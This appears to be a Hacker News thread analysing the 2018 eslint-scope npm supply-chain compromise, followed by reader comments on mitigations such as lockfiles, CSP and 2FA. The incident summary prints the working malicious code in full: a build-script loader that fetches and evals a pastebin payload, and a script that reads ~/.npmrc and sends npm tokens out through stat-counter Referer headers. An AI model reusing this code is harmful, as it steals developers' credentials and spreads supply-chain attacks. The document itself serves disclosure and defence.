The fact that npmjs.com revoked access token has no effect on private repositories access tokens. I would recommend everyone, who uses private npm repositories, to investigate a possibility of credentials leak.


# Tech summary:

- Since 2018-07-12 9:49 UTC eslint-scope has been infected and the script was trying to send your ".npmrc" file to two different stat counter websites (sstatic1.histats.com, c.statcounter.com), via the referrer header.Affected packages: eslint-scope@3.7.2 and eslint-config-eslint@5.0.2.

- The ".npmrc" (contains your npm tokens to publish a new npm package under your account) would allow the attacker to publish other npm package under your name (if you are a owner) and make a bigger mess.

- Looks like the attacker wanted to gain more npm packages and maybe has done so already. The attacker removed the infected package at 2018-07-12 12:37 UTC so he had at least a few hours to gather other npm auth tokens.

- Between 2018-07-12 12:37 UTC and 2018-07-12 17:41 UTC the package eslint-scope@3.7.2 has been removed, but some pc could get this old package because of some cache, increasing the attack vector. Only at 2018-07-12 17:41 UTC a new version has been deployed.

- Be careful if you cache npm packages on your server (nexus or similar).

# All npm packages that directly depends on "eslint-scope"

  - "webpack" (9k dependents)
  - "eslint" (6k dependents)
  - "babel-eslint" (5k dependents)
  - "vue-eslint-parser"
  - "atom-eslint-parser"
  - "eslint-web"
  - "react-input-select"
  - "react-native-handcheque-engine"
  - "react-redux-demo1"
  - "a_react_reflux_demo"
  - "eslint-nullish-coalescing"
  - "@mattduffield/eslint4b"
  - "miguelcostero-ng2-toasty"
  - "@sailshq/eslint"
  - "eslint4b"
  - "@helpscout/zero"
 
Be careful there are more packages that depends on these as well.

# What to do now?

Assume your ".npmrc" file has been stolen. If you have any packages published they might have been compromised, check them. NPM team revoked all auth tokens at 2018-07-12 12:30 UTC.

# How it happened:

"The maintainer whose account was compromised had reused their npm password on several other sites and did not have two-factor authentication enabled on their npm account."

# How has been discovered

At 12:17 UK time on 12 July 2018 https://github.com/pronebird opened an issue https://github.com/eslint/eslint-scope/issues/39 with this log error:

  [2/3] ⠠ eslint-scope
  error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
    Exit code: 1
  Command: node ./lib/build.js
  Arguments:
    Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope
  Output:
    undefined:30
  https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+conten
      ^^^^^^
  
      SyntaxError: Unexpected end of input
  at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
  at emitOne (events.js:116:13)
  at IncomingMessage.emit (events.js:211:7)
  at IncomingMessage.Readable.read (_stream_readable.js:475:10)
  at flow (_stream_readable.js:846:34)
  at resume_ (_stream_readable.js:828:3)
  at _combinedTickCallback (internal/process/next_tick.js:138:11)

So looks like if there was no error we would not discover it so quickly. So we were lucky!

#Technical details:

node_module code for eslint-scope-3.7.2 https://registry.npmjs.org/eslint-scope/-/eslint-scope-3.7.2... (still the original code):

  try {
    var https = require('https');
    https.get({
      'hostname': 'pastebin.com',
      path: '/raw/XLeVP82h',
      headers: {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
        Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
      }
    }, (r) => {
      r.setEncoding('utf8');
      r.on('data', (c) => {
        eval(c);
      });
      r.on('error', () => {
      });
  
    }).on('error', () => {
    });
  } catch (e) {
  }
Pastebin script http://pastebin.com/raw/XLeVP82h (Now removed):

  try {
    var path = require('path');
    var fs = require('fs');
    var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, '.npmrc');
    var content = "nofile";
  
    if (fs.existsSync(npmrc)) {
  
      content = fs.readFileSync(npmrc, {encoding: 'utf8'});
      content = content.replace('//registry.npmjs.org/:_authToken=', '').trim();
  
      var https1 = require('https');
      https1.get({
        hostname: 'sstatic1.histats.com',
        path: '/0.gif?4103075&101',
        method: 'GET',
        headers: {Referer: 'http://1.a/' + content}
      }, () => {
      }).on("error", () => {
      });
      https1.get({
        hostname: 'c.statcounter.com',
        path: '/11760461/0/7b5b9d71/1/',
        method: 'GET',
        headers: {Referer: 'http://2.b/' + content}
      }, () => {
      }).on("error", () => {
      });
  
    }
  } catch (e) {
  }

"As you can tell, the script finds your npmrc file and passes your auth token to two different stat counter websites, via the referrer header."

Source: https://github.com/eslint/eslint-scope/issues/39

# How to mitigate front-end code from malicious npm/yarn packages

I actually discussed this with my colleagues at work. I think from now on I'll assume that all code is compromised.

One big way to reduce this attack vector is to use content-security-privacy set to sandbox https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP . This will not allow your page to open any requests to other websites, not even a img tag or window.open. In this way even if the attacked has your password can't send it to his server.

Of course he can mess up with your code, but reduces a bit the attack vector. Example: let's say you are building a trading platform, you want to buy 1 share, but the attacker will bump your order to 10 shares without you even knowing. For this to happen, the attacker has to specifically target your website.

Read more about security of node_modules and other packages (this could affect java and other languages, not just javascript and npm/yarn): https://hackernoon.com/im-harvesting-credit-card-numbers-and...

Be careful that if you white list google analytics the attacker can send the passwords to his google analytics account as well. You could also check if the url of analytics contains your GA-ID, but the attacker could bypass this one as well.

# What to do next

Think of more ways to mitigate malicious node_modules and how to handle it.

Even if npm will improve the security, we still can't rely on devs to have the best interest in mind or being hacked. So I think we really need to accept that npm modules are infected by default and work from there.

# More implications that I can think about (add more please)

Assume your server (jenkins) that loads your node_modules can also be infected (you could use docker to mitigate this issue).

If you run a node.js app, be careful about the open ports and the network request (limit in and outbound domains). That's not enough, the attacker could generate a new route on your website "/your-passwords" and return a json with your users table. Not easy to do, but possible if your server has a malicious node_module.

Any other important/private files you have on your pc could have been stolen.

Very unlikely: Your server side could be infected (maybe some other code has been executed there from this package, I'm not sure if you can update the pastebin contents) and propagate to other servers.

This is just a package we happened to notice, maybe there are more infected packages we don't know about.


I am not familiar with npm package maintenance. Can somebody explain these two recommendations to me?

    Package maintainers should be careful with using
    any services that auto-merge dependency upgrades.
What is an example of such a service? What is an 'auto-merge' of 'dependency upgrades'?

    Application developers should use a lockfile
    (package-lock.json or yarn.lock) to prevent the
    auto-install of new packages.
What is an auto-install of a new package? What triggers it?


I guess there's CI services that pull latest versions of dependencies (in the accepted version range), build, run tests and submit a pull request if everything seems ok.

Edit: actually no I don't know, there would be nothing to submit if no lockfile is used.


One thing is unclear to me is, how does sending the credentials to statcounter work for the attacker? How would they recover the credentials afterwards? Assuming the statcounter website itself has not turned bad of course.

I can think about two potential ways but I have no idea if it's any of those:

- Very detailed filter to the point of seeing individual requests and so the token in the referrer URL.

- The referrer URL is the one that is actually getting the info, so when statcounter tries to crawl it then it will send the credentials there.


Does anyone know if this would also affect desktop/Electron apps that use those packages?


So what are you (the ESLint team) going to do to ensure this is not going to happen again in the future?

At the very least you should require that all ESLint members with rights to publish ESLint packages have 2FA enabled on their npm account.


can't nodejs run default as user "node-<project-name>-<username>"? ie. run the process as "node-react-whatcanthisbee"?

(or provide option to do so using "isolated-node" versions/flags/etc)

that way, a lot of malicious stuff can be blocked with unix/linux basic permissions

(though spectre/etc stuff will be much harder to catch...)


It appears all publishing keys have been revoked? We don't use eslint at work, yet all our publishing keys were revoked.


npm shrinkwrap could have helped here (at least with the spreading).


Npm uses a lockfile by default now.


so now only typing `npm update` will get your data stolen. how innovative.


It kinda sucks that NPM auth tokens never expire


Who was this attacker? I don't believe he is impossible to track down. Have eslint called law enforcement?


the attacker used generic sites (pastebin, stat counter sites) and there is no reason they did not access them through tor. Why would it be possible to track them down?


Ah, stat counter - I've read "he has sent to himself" thought somehow directly.

Yes, not so easy.


"Security by punishment" is a terrible paradigm that's not Web Scale. The internet is not the physical world — the attackers are probably accessing your stuff via Tor from a public wifi in a country far away.

If someone couldn't do basic things to secure their account, they should take the blame.


we don't need to victim blame here. we can both practice security best practices and also try to find and prosecute those responsible.


The only recommendation for users is "you should avoid reusing the same password across multiple different sites. A password manager like 1Password or LastPass can help with this."

Seriously? No help to tell me if I have been affected?

If someone here knows a JS linter that does not require npm/yarn, even ten times less powerful than eslint, please share. It's astonishing that linting C++ requires one file, https://github.com/google/styleguide/blob/gh-pages/cpplint/c..., but linting JS requires MBs of dependencies.


Google's Closure compiler [1] has been around forever (the Java version, anyway). There used to be a separate linter, but now it's wrapped into the compiler using the flag `--jscomp_warnings=lintChecks`

Given the number of other tools in my workflow that are all JS based (webpack, etc.) I don't use it, but I've heard good things from people who have.

[1] https://developers.google.com/closure/compiler/




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: